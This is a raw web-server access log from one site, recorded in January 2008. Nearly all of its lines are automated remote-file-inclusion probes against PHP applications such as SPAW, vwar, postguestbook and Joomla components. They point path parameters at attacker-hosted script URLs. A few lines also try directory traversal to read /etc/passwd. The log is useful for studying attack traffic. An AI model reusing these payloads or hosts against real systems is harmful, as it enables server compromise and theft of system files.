208.76.110.169 - - [06/Jan/2008:15:14:25 -0800] "GET /logs//convert/mvcw.php?step=1&vwar_root=http://www.phys.uu.nl/~spada/guestbook/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.157.111.180 - - [06/Jan/2008:15:14:44 -0800] "GET /logs/access_071216.log//spaw_control.class.php?spaw_root=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.157.111.180 - - [06/Jan/2008:15:14:45 -0800] "GET //spaw_control.class.php?spaw_root=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.157.111.180 - - [06/Jan/2008:15:14:46 -0800] "GET /logs//spaw_control.class.php?spaw_root=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.157.111.180 - - [06/Jan/2008:15:15:12 -0800] "GET //spaw_control.class.php?spaw_root=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.25.195.72 - - [06/Jan/2008:15:16:17 -0800] "GET /logs/access_071229.log/forum.php?seite=http://libra03.com/ifactor-old/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.25.195.72 - - [06/Jan/2008:15:16:17 -0800] "GET /forum.php?seite=http://libra03.com/ifactor-old/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.25.195.72 - - [06/Jan/2008:15:16:18 -0800] "GET /logs/forum.php?seite=http://libra03.com/ifactor-old/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.157.111.180 - - [06/Jan/2008:15:17:09 -0800] "GET /logs/access_071220.log//spaw_control.class.php?spaw_root=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.147.74 - - [06/Jan/2008:15:19:44 -0800] "GET /index.php?redir=http://www.gulzarii.com/myfolder/r8?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.63.234 - - [06/Jan/2008:15:21:00 -0800] "GET /include/footer.inc.php?_AMLconfig[cfg_serverpath]=http://www.humanesociety.com/media/phpbo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
70.87.63.234 - - [06/Jan/2008:15:21:00 -0800] "GET /logs/include/footer.inc.php?_AMLconfig[cfg_serverpath]=http://www.humanesociety.com/media/phpbo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
85.157.111.180 - - [06/Jan/2008:15:21:03 -0800] "GET /logs/access_071218.log//spaw_control.class.php?spaw_root=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.157.111.180 - - [06/Jan/2008:15:23:08 -0800] "GET /logs/access_071212.log//spaw_control.class.php?spaw_root=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.157.111.180 - - [06/Jan/2008:15:23:32 -0800] "GET /logs/access_071221.log//spaw_control.class.php?spaw_root=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.188.10 - - [06/Jan/2008:15:24:15 -0800] "GET /include/footer.inc.php?_AMLconfig[cfg_serverpath]=http://www.humanesociety.com/media/phpbo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
207.44.188.10 - - [06/Jan/2008:15:24:21 -0800] "GET /logs/include/footer.inc.php?_AMLconfig[cfg_serverpath]=http://www.humanesociety.com/media/phpbo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
85.157.111.180 - - [06/Jan/2008:15:24:24 -0800] "GET /logs/access_071219.log//spaw_control.class.php?spaw_root=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.87.63.234 - - [06/Jan/2008:15:25:27 -0800] "GET /wptable-button.phpp?wpPATH=http://www.humanesociety.com/media/phpbo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
70.87.63.234 - - [06/Jan/2008:15:25:29 -0800] "GET /logs/wptable-button.phpp?wpPATH=http://www.humanesociety.com/media/phpbo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
85.157.111.180 - - [06/Jan/2008:15:25:45 -0800] "GET /logs/access_071129.log//spaw_control.class.php?spaw_root=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.157.111.180 - - [06/Jan/2008:15:27:20 -0800] "GET /logs/access_071116.log//spaw_control.class.php?spaw_root=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.188.10 - - [06/Jan/2008:15:27:49 -0800] "GET /wptable-button.phpp?wpPATH=http://www.humanesociety.com/media/phpbo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
207.44.188.10 - - [06/Jan/2008:15:27:54 -0800] "GET /logs/wptable-button.phpp?wpPATH=http://www.humanesociety.com/media/phpbo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
70.87.63.234 - - [06/Jan/2008:15:28:13 -0800] "GET /upgrade_album.php?GALLERY_BASEDIR=http://www.humanesociety.com/media/phpbo.do??? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
70.87.63.234 - - [06/Jan/2008:15:28:16 -0800] "GET /logs/upgrade_album.php?GALLERY_BASEDIR=http://www.humanesociety.com/media/phpbo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
85.157.111.180 - - [06/Jan/2008:15:30:06 -0800] "GET /logs/access_071224.log//spaw_control.class.php?spaw_root=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.17.101.126 - - [06/Jan/2008:15:30:06 -0800] "GET /logs/access_071216.log//spaw_control.class.php?spaw_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.17.101.126 - - [06/Jan/2008:15:30:06 -0800] "GET //spaw_control.class.php?spaw_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.17.101.126 - - [06/Jan/2008:15:30:06 -0800] "GET /logs//spaw_control.class.php?spaw_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.17.101.126 - - [06/Jan/2008:15:31:15 -0800] "GET /logs/access_071218.log//spaw_control.class.php?spaw_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.17.101.126 - - [06/Jan/2008:15:31:33 -0800] "GET /logs/access_071220.log//spaw_control.class.php?spaw_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.17.101.126 - - [06/Jan/2008:15:33:19 -0800] "GET /logs/access_071212.log//spaw_control.class.php?spaw_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.17.101.126 - - [06/Jan/2008:15:33:36 -0800] "GET /logs/access_071221.log//spaw_control.class.php?spaw_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.157.111.180 - - [06/Jan/2008:15:34:03 -0800] "GET /logs/access_071203.log//spaw_control.class.php?spaw_root=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.17.101.126 - - [06/Jan/2008:15:34:08 -0800] "GET /logs/access_071219.log//spaw_control.class.php?spaw_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.198.111 - - [06/Jan/2008:15:34:26 -0800] "GET /logs/access_071229.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.198.111 - - [06/Jan/2008:15:34:26 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.198.111 - - [06/Jan/2008:15:34:26 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.198.111 - - [06/Jan/2008:15:34:26 -0800] "GET /logs/access_071229.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.198.111 - - [06/Jan/2008:15:34:26 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.198.111 - - [06/Jan/2008:15:34:27 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.17.101.126 - - [06/Jan/2008:15:34:33 -0800] "GET /logs/access_071129.log//spaw_control.class.php?spaw_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.198.111 - - [06/Jan/2008:15:34:40 -0800] "GET /logs/access_071229.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.198.111 - - [06/Jan/2008:15:34:40 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.198.111 - - [06/Jan/2008:15:34:40 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.17.101.126 - - [06/Jan/2008:15:35:38 -0800] "GET /logs/access_071116.log//spaw_control.class.php?spaw_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.157.111.180 - - [06/Jan/2008:15:38:00 -0800] "GET /logs/access_071214.log//spaw_control.class.php?spaw_root=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.17.101.126 - - [06/Jan/2008:15:38:21 -0800] "GET /logs/access_071224.log//spaw_control.class.php?spaw_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.186.169.183 - - [06/Jan/2008:15:38:37 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [06/Jan/2008:15:38:49 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.17.101.126 - - [06/Jan/2008:15:39:55 -0800] "GET /logs/access_071203.log//spaw_control.class.php?spaw_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.17.101.126 - - [06/Jan/2008:15:40:47 -0800] "GET /logs/access_071214.log//spaw_control.class.php?spaw_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.254.58.42 - - [06/Jan/2008:15:41:13 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
65.254.58.42 - - [06/Jan/2008:15:41:14 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
208.186.169.183 - - [06/Jan/2008:15:41:17 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.55.148.27 - - [06/Jan/2008:15:41:30 -0800] "GET /index.php?option=com_mp3_allopass&Itemid=&mosConfig_absolute_path=http://www.humanesociety.com/media/phpbo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
72.55.148.27 - - [06/Jan/2008:15:41:31 -0800] "GET /logs/index.php?option=com_mp3_allopass&Itemid=&mosConfig_absolute_path=http://www.humanesociety.com/media/phpbo.do??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
192.65.130.130 - - [06/Jan/2008:15:42:55 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
192.65.130.130 - - [06/Jan/2008:15:42:56 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
85.25.144.170 - - [06/Jan/2008:15:45:15 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://arf.org.uk/media/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
85.25.144.170 - - [06/Jan/2008:15:45:15 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://arf.org.uk/media/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
207.44.188.10 - - [06/Jan/2008:15:45:29 -0800] "GET /upgrade_album.php?GALLERY_BASEDIR=http://www.humanesociety.com/media/phpbo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
207.44.188.10 - - [06/Jan/2008:15:45:36 -0800] "GET /logs/upgrade_album.php?GALLERY_BASEDIR=http://www.humanesociety.com/media/phpbo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:15:45:38 -0800] "GET /logs/access_071229.log//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:15:45:38 -0800] "GET //com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.186.169.183 - - [06/Jan/2008:15:45:39 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [06/Jan/2008:15:45:44 -0800] "GET /logs/access_071229.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [06/Jan/2008:15:45:44 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
91.121.87.84 - - [06/Jan/2008:15:48:53 -0800] "GET /index.php?option=com_mp3_allopass&Itemid=&mosConfig_absolute_path=http://www.humanesociety.com/media/phpbo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
91.121.87.84 - - [06/Jan/2008:15:48:53 -0800] "GET /logs/index.php?option=com_mp3_allopass&Itemid=&mosConfig_absolute_path=http://www.humanesociety.com/media/phpbo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
85.157.111.180 - - [06/Jan/2008:15:51:36 -0800] "GET /logs/access_071210.log//spaw_control.class.php?spaw_root=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.17.101.126 - - [06/Jan/2008:15:52:39 -0800] "GET /logs/access_071210.log//spaw_control.class.php?spaw_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.157.111.180 - - [06/Jan/2008:15:53:31 -0800] "GET /logs/access_071119.log//spaw_control.class.php?spaw_root=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.225.219.10 - - [06/Jan/2008:15:53:46 -0800] "GET /logs/access_071220.log//modules/xfsection/modify.php?dir_module=http://www.sonixsoft.de//libraries/pcl/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.219.10 - - [06/Jan/2008:15:53:46 -0800] "GET //modules/xfsection/modify.php?dir_module=http://www.sonixsoft.de//libraries/pcl/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.219.10 - - [06/Jan/2008:15:53:46 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.sonixsoft.de//libraries/pcl/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.17.101.126 - - [06/Jan/2008:15:53:51 -0800] "GET /logs/access_071119.log//spaw_control.class.php?spaw_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.26.162 - - [06/Jan/2008:15:55:26 -0800] "GET /logs/ HTTP/1.0" 200 29547 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.15.129.105 - - [06/Jan/2008:15:58:41 -0800] "GET /logs/access_071220.log//modules/xfsection/modify.php?dir_module=http://www.sonixsoft.de//libraries/pcl/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.15.129.105 - - [06/Jan/2008:15:58:41 -0800] "GET //modules/xfsection/modify.php?dir_module=http://www.sonixsoft.de//libraries/pcl/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.15.129.105 - - [06/Jan/2008:15:58:41 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.sonixsoft.de//libraries/pcl/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.34.32.66 - - [06/Jan/2008:15:59:06 -0800] "GET /logs/access_071129.log/index.php?pg=http://www.hobbiz.com/images/powered/_vti_cnf/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.34.32.66 - - [06/Jan/2008:15:59:07 -0800] "GET /index.php?pg=http://www.hobbiz.com/images/powered/_vti_cnf/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.34.32.66 - - [06/Jan/2008:15:59:07 -0800] "GET /logs/index.php?pg=http://www.hobbiz.com/images/powered/_vti_cnf/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.9.155.30 - - [06/Jan/2008:16:01:37 -0800] "GET /logs/access_071218.log/admin.php?include_path=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.9.155.30 - - [06/Jan/2008:16:01:37 -0800] "GET /admin.php?include_path=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.9.155.30 - - [06/Jan/2008:16:01:37 -0800] "GET /logs/admin.php?include_path=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.9.155.30 - - [06/Jan/2008:16:02:41 -0800] "GET /logs/access_071229.log/admin.php?include_path=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.125.244.178 - - [06/Jan/2008:16:03:38 -0800] "GET /logs/access_071220.log//modules/xfsection/modify.php?dir_module=http://www.chatjam3h.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.244.178 - - [06/Jan/2008:16:03:39 -0800] "GET //modules/xfsection/modify.php?dir_module=http://www.chatjam3h.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.244.178 - - [06/Jan/2008:16:03:39 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.chatjam3h.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.55.148.27 - - [06/Jan/2008:16:05:23 -0800] "GET /index.php?option=com_cpg&Itemid=&mosConfig_absolute_path=http://www.humanesociety.com/media/phpbo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
72.55.148.27 - - [06/Jan/2008:16:05:23 -0800] "GET /logs/index.php?option=com_cpg&Itemid=&mosConfig_absolute_path=http://www.humanesociety.com/media/phpbo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
91.121.87.84 - - [06/Jan/2008:16:09:40 -0800] "GET /index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.humanesociety.com/media/phpbo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
91.121.87.84 - - [06/Jan/2008:16:09:40 -0800] "GET /logs/index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.humanesociety.com/media/phpbo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
74.200.83.90 - - [06/Jan/2008:16:10:25 -0800] "GET /logs/access_071220.log//modules/xfsection/modify.php?dir_module=http://www.sonixsoft.de//libraries/pcl/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.200.83.90 - - [06/Jan/2008:16:10:25 -0800] "GET //modules/xfsection/modify.php?dir_module=http://www.sonixsoft.de//libraries/pcl/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.200.83.90 - - [06/Jan/2008:16:10:25 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.sonixsoft.de//libraries/pcl/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
196.40.106.216 - - [06/Jan/2008:16:11:16 -0800] "GET /logs/admin.php?include_path=http://www.stlouisdreamhome.com/components/com_joomlalib/red.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
87.118.106.191 - - [06/Jan/2008:16:11:19 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=/../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
87.118.106.191 - - [06/Jan/2008:16:11:20 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=/../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
196.40.106.216 - - [06/Jan/2008:16:11:26 -0800] "GET /admin.php?include_path=http://www.stlouisdreamhome.com/components/com_joomlalib/red.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
70.84.94.98 - - [06/Jan/2008:16:11:41 -0800] "GET /logs/access_071220.log//modules/xfsection/modify.php?dir_module=http://mpva.com.au/_baks/.../xpl? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.84.94.98 - - [06/Jan/2008:16:11:41 -0800] "GET //modules/xfsection/modify.php?dir_module=http://mpva.com.au/_baks/.../xpl? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.84.94.98 - - [06/Jan/2008:16:11:42 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://mpva.com.au/_baks/.../xpl? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.232.68.17 - - [06/Jan/2008:16:11:58 -0800] "GET /logs/access_071214.log/admin.php?include_path=http://www.freewebtown.com/darkscan/testmod.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.232.68.17 - - [06/Jan/2008:16:11:58 -0800] "GET /admin.php?include_path=http://www.freewebtown.com/darkscan/testmod.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.232.68.17 - - [06/Jan/2008:16:11:58 -0800] "GET /logs/admin.php?include_path=http://www.freewebtown.com/darkscan/testmod.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.19.162 - - [06/Jan/2008:16:13:11 -0800] "GET /bikes/dteel/140CANON/ HTTP/1.0" 200 971 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
216.117.137.122 - - [06/Jan/2008:16:14:08 -0800] "GET /logs/access_071224.log/config.php?path_to_root=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.117.137.122 - - [06/Jan/2008:16:14:08 -0800] "GET /config.php?path_to_root=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
